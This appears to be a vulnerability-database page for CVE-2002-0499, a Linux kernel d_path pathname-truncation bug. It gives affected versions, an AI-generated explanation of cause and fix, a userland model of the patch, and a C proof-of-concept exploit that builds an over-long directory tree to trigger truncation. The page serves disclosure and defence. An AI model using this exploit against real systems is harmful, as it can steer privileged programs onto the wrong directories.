CVE-2002-0499
Description
The d_path function in Linux kernel 2.2.20 and earlier, and 2.4.18 and earlier, truncates long pathnames without generating an error, which could allow local users to force programs to perform inappropriate operations on the wrong directories.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- cpe:2.3:o:linux:linux_kernel:2.2.0:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.1:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.10:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.11:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.12:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.13:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.14:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.15:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.16:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.17:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.18:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.19:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.2:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.20:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.3:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.4:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.5:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.6:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.7:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.8:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.2.9:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.3.0:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.3.99:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*
- cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*
- Range: <=2.2.20, <=2.4.18
Patches
Vulnerability mechanics
Root cause
"The d_path function in the Linux kernel truncates long pathnames without reporting an error."
Attack vector
Local users can exploit this vulnerability by creating a directory structure whose path exceeds the buffer size allocated for pathnames. When the `d_path()` function converts this long path into a string, it truncates the path without indicating an error. Programs that rely on the result can then operate on incorrect or unintended directories, potentially allowing inappropriate operations [ref_id=1].
Affected code
The vulnerability resides in the `d_path()` function within the Linux kernel's `fs/dcache.c` file. This function is responsible for converting a dentry structure into an ASCII pathname. The issue occurs when the generated pathname exceeds the fixed-size buffer, leading to truncation without error reporting [ref_id=1].
What the fix does
The patch modifies the `d_path()` function to return an error code of -ENAMETOOLONG when the path exceeds the buffer length, instead of truncating it. This change ensures that callers are explicitly notified of the overly long path, preventing them from proceeding with truncated information. The fix is applied to the `fs/dcache.c` file [ref_id=2].
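A userland model of the change described above, added here as an illustration; it is not the kernel's `d_path()` code or the patch. `struct node`, `build_path()`, `sample_path()` and the sample tree are hypothetical, and the right-to-left build order is an assumption of the model.

```c
#include <errno.h>
#include <string.h>

/* Hypothetical stand-in for a dentry: a name and a link to the parent. */
struct node { const char *name; const struct node *parent; };

/* Build n's absolute path right-to-left into buf[0..buflen).
 * strict == 0 models the pre-fix behaviour: when space runs out, stop and
 * return what fits, silently losing the leading components.
 * strict != 0 models the fix: return -ENAMETOOLONG instead.
 * On success, *out points at the start of the path inside buf. */
int build_path(const struct node *n, char *buf, size_t buflen,
               int strict, const char **out)
{
    if (buflen < 2)
        return -ENAMETOOLONG;
    char *end = buf + buflen - 1;
    size_t left = buflen - 1;       /* bytes still free before the '\0' */
    *end = '\0';
    for (; n && n->parent; n = n->parent) {
        size_t len = strlen(n->name);
        if (len + 1 > left) {       /* no room for "/" plus this name */
            if (strict)
                return -ENAMETOOLONG;
            break;                  /* silent truncation */
        }
        end -= len;
        memcpy(end, n->name, len);
        *--end = '/';
        left -= len + 1;
    }
    if (*end == '\0')               /* nothing written: report "/" */
        *--end = '/';
    *out = end;
    return 0;
}

/* Constructed sample tree: / -> tmp -> a -> etc */
static const struct node root = { "", NULL }, tmp = { "tmp", &root },
                         dir_a = { "a", &tmp }, etc = { "etc", &dir_a };

/* Resolve the sample leaf using buflen bytes of buffer; NULL on error. */
const char *sample_path(size_t buflen, int strict)
{
    static char buf[64];
    const char *p;
    if (buflen > sizeof(buf) || build_path(&etc, buf, buflen, strict, &p) < 0)
        return NULL;
    return p;
}
```

With a 5-byte buffer the unchecked variant reports `/etc` for a directory that is really `/tmp/a/etc`, while the strict variant returns an error that the caller has to handle.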
Preconditions
- auth: The attacker must have local user access to the affected system.
- input: The attacker must be able to create a directory structure with a path length exceeding the kernel's buffer limit.
Reproduction
```c
/*
 * 2.2.x/2.4.x Linux kernel d_path proof-of-concept exploit
 *
 * Bug found by cliph
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* strlen() */
#include <limits.h>
#include <errno.h>
#include <paths.h>
#include <sys/stat.h>   /* mkdir() */
#include <sys/types.h>

/*
 * Note: on Linux 2.2.x PATH_MAX = PAGE_SIZE - 1 that gives us 1 byte for
 * trailing '\0'
 */

#define PATH_COMPONENT "123456789abcdef"

/* Print msg with the errno text and exit if the previous call set errno. */
void err(char *msg)
{
    if (errno) {
        perror(msg);
        exit(1);
    }
}

int main()
{
    char buf[PATH_MAX + 1]; /* think of trailing '\0' */
    int len;

    errno = 0;

    chdir(_PATH_TMP);
    err("chdir");

    /* show CWD before exploiting the bug */
    getcwd(buf, sizeof(buf));
    err("getcwd #1");
    fprintf(stderr, "CWD=%.40s\n", buf);

    /* creating long directory tree - it must exceed PATH_MAX characters */
    for (len = 0; len <= PATH_MAX; len += strlen(PATH_COMPONENT) + 1) {
        errno = 0;
        mkdir(PATH_COMPONENT, 0700);
        if (errno != EEXIST)
            err("mkdir");
        errno = 0;
        chdir(PATH_COMPONENT);
        err("chdir");
    }

    /* show CWD after exploiting the bug */
    getcwd(buf, sizeof(buf));
    err("getcwd #2");
    fprintf(stderr, "CWD=%.40s... [stripped]\n", buf);

    return 0;
}
```

[ref_id=1]
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- www.securityfocus.com/bid/4367 (nvd: Exploit, Vendor Advisory)
- www.iss.net/security_center/static/8634.php (nvd: Vendor Advisory)
- www.securityfocus.com/archive/1/264117 (nvd: Vendor Advisory)
- archives.neohapsis.com/archives/vulnwatch/2002-q1/0074.html (nvd)
- www.cs.helsinki.fi/linux/linux-kernel/2002-13/0054.html (nvd)